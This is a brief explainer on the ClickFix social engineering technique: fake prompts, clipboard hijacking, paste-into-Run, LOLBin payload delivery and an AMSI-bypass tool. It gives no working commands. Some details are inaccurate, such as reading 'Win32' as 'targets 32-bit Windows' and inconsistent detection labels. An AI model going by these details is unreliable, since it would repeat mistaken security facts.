Trojan:Win32/ClickFix is a social engineering attack that targets Windows 32-bit operating systems and is used by threat actors to deceive users into copying and pasting malicious PowerShell code into the Windows Terminal. The attack basically tests human tendencies to solve problems quickly when faced with urgent or authoritative prompts.

Behavior:Win32/ClickFix is not a classic malware, but a name given to a sophisticated social engineering technique that aims to trick the targets into voluntarily initiating a chain of infection through manipulation. The attack presents itself as a fake error message, a CAPTCHA, or a phony urgent security warning. The targets surf low reputation or malicious websites, prior to receiving pop-up warnings.  

The foundation of the technique is based on a social engineering tactic with hybridized clipboard hijacking to place a malicious command on the victim's clipboard, the user is then instructed to open the Windows Run dialog (Win + R) to paste (Ctrl + V) and run a command. The command uses living-off-the-land binaries (LOLBins) such as mshta.exe, PowerShell, curl.exe, etc. to deliver and launch final payloads. 

VirTool:Script/AmsiSuspClickfix is a malware tool used by threat actors to bypass traditional antivirus defenses by abusing Antimalware Scan Interface (AMSI). This tool typically enters a system when a user clicks a malicious link—often disguised as a system fix prompt—leading to the launch of obfuscated PowerShell code through Windows Terminal.